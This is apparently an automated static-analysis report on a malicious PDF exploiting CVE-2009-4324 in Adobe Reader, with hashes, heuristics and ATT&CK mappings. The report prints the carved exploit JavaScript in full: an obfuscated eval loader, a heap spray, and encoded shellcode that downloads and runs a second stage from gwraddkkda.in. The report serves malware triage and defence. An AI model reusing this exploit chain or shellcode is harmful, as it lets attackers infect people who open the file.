Malicious PDF — malware analysis report

Static analysis result for SHA-256 7a81bff6bfae4667…

MALICIOUS

PDF

21.4 KB
MD5: 321967fc3e1599322bafa5b684888377 SHA-1: dd53b055e463135cae821b9a4e78eb6fb5445220 SHA-256: 7a81bff6bfae4667f116cd1664af9cc0acde020e4cb228561393500e684469fd
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that leverages the CVE-2009-4324 vulnerability via the media.newPlayer API. This script is designed to download and execute a second-stage payload from the URL http://gwraddkkda.in/new/post.php?e=8&&. The ML classifier strongly indicates maliciousness, and the presence of a known exploit confirms the attack vector.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gwraddkkda.in/new/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
bf837ed9d063118125e8479246f77caa7edfd17f54200ce1dfaaeee7e8599bf1		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2205 bytes
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/SLkquXbLgJ77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var VOUDUIcVla89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/SLkquXbLgJ77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var wUyzGPpGXR1 = VOUDUIcVla89[1];
var OfhfuEwkis3 = VOUDUIcVla89[2];
var xEvMohjzoH17 = SLkquXbLgJ77[wUyzGPpGXR1+"v"+VOUDUIcVla89[3]+"l"];
var MVVjcbiiVi18 = SLkquXbLgJ77[VOUDUIcVla89[13]+VOUDUIcVla89[14]+wUyzGPpGXR1+"s"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+VOUDUIcVla89[15]+wUyzGPpGXR1];


xEvMohjzoH17("v"+VOUDUIcVla89[3]+"r hNWGGzFtAI15 = /"+VOUDUIcVla89[7]+VOUDUIcVla89[8]+VOUDUIcVla89[8]+"/"+VOUDUIcVla89[9]+VOUDUIcVla89[10]+";");

var RSqKNBhdMX10 = SLkquXbLgJ77z[/*iiosooosoos*/     "d"+VOUDUIcVla89[7-1]+VOUDUIcVla89[7+1]];

RSqKNBhdMX10[VOUDUIcVla89[7]+"yn"+VOUDUIcVla89[8]+"A"+VOUDUIcVla89[14]+VOUDUIcVla89[14]+"o"+VOUDUIcVla89[11]+"S"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+"n"]();

var leNkeTzTaW4 = RSqKNBhdMX10[VOUDUIcVla89[10]+wUyzGPpGXR1+"tAnn"+VOUDUIcVla89[6]+VOUDUIcVla89[11]+VOUDUIcVla89[7]](0);

var lchAQczWyg5 = leNkeTzTaW4[0][VOUDUIcVla89[7]+"ubj"+wUyzGPpGXR1+VOUDUIcVla89[8]+VOUDUIcVla89[11]];

var sNLasFepqN6 = lchAQczWyg5/*iiosooosoos*/[VOUDUIcVla89/*iiosooosoos*/[11+1]+wUyzGPpGXR1+/*iiosooosoos*/VOUDUIcVla89[15]+"l"/*iiosooosoos*/+VOUDUIcVla89/*iiosooosoos*/[3]+VOUDUIcVla89/*iiosooosoos*/[8]+wUyzGPpGXR1]/*iiosooosoos*/(hNWGGzFtAI15,OfhfuEwkis3);

var hbsvLWPKqp7=MVVjcbiiVi18(MVVjcbiiVi18(sNLasFepqN6));
xEvMohjzoH17(hbsvLWPKqp7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js
9de362ec79011792c5f406718c84fbf2aea19c33a99f344efd8745440d406fe6		 pdf-javascript-stream PDF /JS object 8 at offset 0x209 21353 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/SLkquXbLgJ77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var VOUDUIcVla89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/SLkquXbLgJ77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var wUyzGPpGXR1 = VOUDUIcVla89[1];
var OfhfuEwkis3 = VOUDUIcVla89[2];
var xEvMohjzoH17 = SLkquXbLgJ77[wUyzGPpGXR1+"v"+VOUDUIcVla89[3]+"l"];
var MVVjcbiiVi18 = SLkquXbLgJ77[VOUDUIcVla89[13]+VOUDUIcVla89[14]+wUyzGPpGXR1+"s"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+VOUDUIcVla89[15]+wUyzGPpGXR1];


xEvMohjzoH17("v"+VOUDUIcVla89[3]+"r hNWGGzFtAI15 = /"+VOUDUIcVla89[7]+VOUDUIcVla89[8]+VOUDUIcVla89[8]+"/"+VOUDUIcVla89[9]+VOUDUIcVla89[10]+";");

var RSqKNBhdMX10 = SLkquXbLgJ77z[/*iiosooosoos*/     "d"+VOUDUIcVla89[7-1]+VOUDUIcVla89[7+1]];

RSqKNBhdMX10[VOUDUIcVla89[7]+"yn"+VOUDUIcVla89[8]+"A"+VOUDUIcVla89[14]+VOUDUIcVla89[14]+"o"+VOUDUIcVla89[11]+"S"+VOUDUIcVla89[8]+VOUDUIcVla89[3]+"n"]();

var leNkeTzTaW4 = RSqKNBhdMX10[VOUDUIcVla89[10]+wUyzGPpGXR1+"tAnn"+VOUDUIcVla89[6]+VOUDUIcVla89[11]+VOUDUIcVla89[7]](0);

var lchAQczWyg5 = leNkeTzTaW4[0][VOUDUIcVla89[7]+"ubj"+wUyzGPpGXR1+VOUDUIcVla89[8]+VOUDUIcVla89[11]];

var sNLasFepqN6 = lchAQczWyg5/*iiosooosoos*/[VOUDUIcVla89/*iiosooosoos*/[11+1]+wUyzGPpGXR1+/*iiosooosoos*/VOUDUIcVla89[15]+"l"/*iiosooosoos*/+VOUDUIcVla89/*iiosooosoos*/[3]+VOUDUIcVla89/*iiosooosoos*/[8]+wUyzGPpGXR1]/*iiosooosoos*/(hNWGGzFtAI15,OfhfuEwkis3);

var hbsvLWPKqp7=MVVjcbiiVi18(MVVjcbiiVi18(sNLasFepqN6));
xEvMohjzoH17(hbsvLWPKqp7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 18840
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc37
... (truncated)
legacy_pdfkit_stage_000.js
c3df0b6d669953258363ab802ac0d32c63d5685d76eb2e0ad1f70f86b924f691		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xAB8 1256 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u6E2F%u7765%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js
42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414		 deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
Preview script
First 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */

Open this report in the interactive analyzer, or submit your own file for analysis.